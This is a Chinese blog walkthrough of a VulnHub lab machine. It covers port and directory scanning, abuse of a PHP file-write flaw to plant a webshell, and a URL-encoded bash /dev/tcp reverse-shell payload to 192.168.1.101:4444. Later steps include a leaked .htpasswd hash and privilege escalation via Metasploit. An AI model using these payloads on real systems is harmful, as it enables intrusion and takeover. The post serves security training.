首先进行ip网段扫描
notion image
扫描出来两个ip:192.168.64.2大概率是我们要攻击的对象
去扫描具体的服务nmap -sV -sC -p 22,80,81 192.168.64.2
notion image
接着去访问网站
notion image
这个网站没有什么可以利用的地方,我们再尝试一下进行目录扫描
gobuster dir -u http://192.168.64.2/ -w /Users/qin/Documents/渗透/Fuzz_dict/Web-Content/raft-medium-directories.txt -x php,html,txt,bak,zip
notion image
扫描出来了关键的php路由,我们去访问发现有个文件读取漏洞,我们尝试一下读取当前的文件
notion image
发下本文件就是逻辑就是传入一个文件名,在指定的文件名下面写内容,那么我们可以尝试创建shell.php写入木马进行利用
notion image
访问shell.php发现利用成功
notion image
进行反弹shell
cmd=system(%22bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.101%2F4444%200%3E%261'%22)%3B
拿到初始的www-data的shell
notion image
首先拿到了第一个flag
notion image
根据提示去访问/.cypher-neo.png ,下载下来看了半天也没发现可能是误导。根据提示可能需要用cypher的密码去通过81端口的身份验证,那个端口是nginx服务,我们去查看nginx文件夹喜爱的文件
notion image
发现有.htpasswd 这个私密文件,我们去cat一下得到了密钥的hash
cypher:$apr1$e9o8Y7Om$5zgDW6WOO6Fl8rCC7jpvX0
用john爆破无果,想着直接用msf提权得了,先将本地的shell转到msf里去
notion image
notion image
但是这个shell是PHP Meterpreter我们要再转化成linux/x64 Meterpreter
先生成木马文件
然后用已经获得的PHP Meterpreter的shell上传执行
查看新的shell
notion image
发现成功了,接下来进行提权漏洞的扫描
notion image
发现有不少可以利用,就先一个个尝试,先尝试一下第一个
notion image
发现提权成功
notion image
 
Web Machine(N7)(VulnHub) MacBook M1 VulnHub 靶机搭建:ARM Mac 运行 x86 OVA 镜像
Loading...
NotionNext
NotionNext
一个普通的干饭人🍚
公告
🎉qetx新博客已经上线🎉
-- 感谢您的支持 ---
这里会有什么?
ctf知识
RL学习笔记
有趣的生活日常